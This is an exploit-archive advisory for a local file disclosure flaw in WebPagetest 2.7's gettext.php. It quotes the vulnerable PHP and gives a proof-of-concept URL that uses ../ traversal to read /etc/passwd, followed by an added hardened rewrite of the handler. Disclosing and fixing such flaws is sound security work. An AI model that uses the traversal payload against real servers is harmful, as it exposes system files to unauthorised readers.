
WebPagetest 2.7 LFD Vulnerability

Author: TUNISIAN CYBER , Published: 24-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: WebPagetest 2.7 LFD Vulnerability
[+] Date: 24-12-2013
[+] Category: WebApp
[+] Vendor: http://code.google.com/p/webpagetest/downloads/detail?name=webpagetest_2.7.zip&can=2&q=
[+] Google Dork: n/a
[+] Tested on: KaliLinux/Debian 3.7.2
[+] Friend's blog: http://na3il.com/

########################################################################################
v2.6 Discovered by dun (http://1337day.com/exploit/18980)

+Description:

WebPagetest is an open source project that is primarily being developed and supported by Google
as part of its efforts to make the web faster.

+Exploit:
WebPagetest suffers from an LFD (local file disclosure) vulnerability:

1/LFD:

File: gettext.php
Parameter: file

[PHP]
<?php
include('common.inc');
$ok = false;

if( isset($_GET['file']) && strlen($_GET['file']) )
{
    // $_GET['file'] is appended to $testPath without any sanitisation,
    // so "../" sequences in it walk out of the test directory
    $data = gz_file_get_contents("$testPath/{$_GET['file']}");
    if( $data !== false )
    {
        $ok = true;
        echo $data;
    }
}

if( !$ok )
    header("HTTP/1.0 404 Not Found");
?>
[/PHP]

P.O.C.:
127.0.0.1/webP/www/gettext.php?file=../../../../../../../../../../../etc/passwd
LocalTest: http://i.imgur.com/9MFuGDf.png
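As an added example (not part of the original advisory or of WebPagetest's own code), a hardened rewrite of the same gettext.php handler: it accepts only a bare file name and then confirms the resolved path still lies under $testPath. It assumes, like the original, that common.inc defines $testPath and that gz_file_get_contents() reads either the named file or its .gz variant.

```php
<?php
// Added example, not WebPagetest's own code: a hardened rewrite of the
// gettext.php handler above. Assumes, like the original, that common.inc
// defines $testPath (the current test's directory) and provides
// gz_file_get_contents(), which is assumed to read $file or $file.gz.
include('common.inc');

// Accept only a bare file name: alphanumerics, dot, underscore and dash,
// starting with an alphanumeric. That excludes "/", "\", NUL bytes and the
// "." / ".." entries, so the value cannot name a directory above $testPath.
function safeTestFileName($name)
{
    if (!is_string($name)) {   // file[]=... arrives as an array; reject it
        return false;
    }
    return preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$/', $name) ? $name : false;
}

// Second line of defence: after symlink resolution the target must still
// lie inside $base. realpath() follows symlinks, so a link planted in the
// test directory cannot redirect the read elsewhere.
function isInsideDirectory($base, $path)
{
    $realBase = realpath($base);
    $realPath = realpath($path);
    if ($realBase === false || $realPath === false) {
        return false;
    }
    $realBase = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($realPath, $realBase, strlen($realBase)) === 0;
}

$ok = false;
$name = isset($_GET['file']) ? safeTestFileName($_GET['file']) : false;
if ($name !== false) {
    $path = "$testPath/$name";
    // Check whichever variant the helper would actually open.
    $target = file_exists($path) ? $path : "$path.gz";
    if (isInsideDirectory($testPath, $target)) {
        $data = gz_file_get_contents($path);
        if ($data !== false) {
            $ok = true;
            echo $data;
        }
    }
}

if (!$ok) {
    header("HTTP/1.0 404 Not Found");
}
```

With this version the P.O.C. request above is answered with a 404, because "../../../../../../../../../../../etc/passwd" fails the file-name check before any path is built.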


########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################
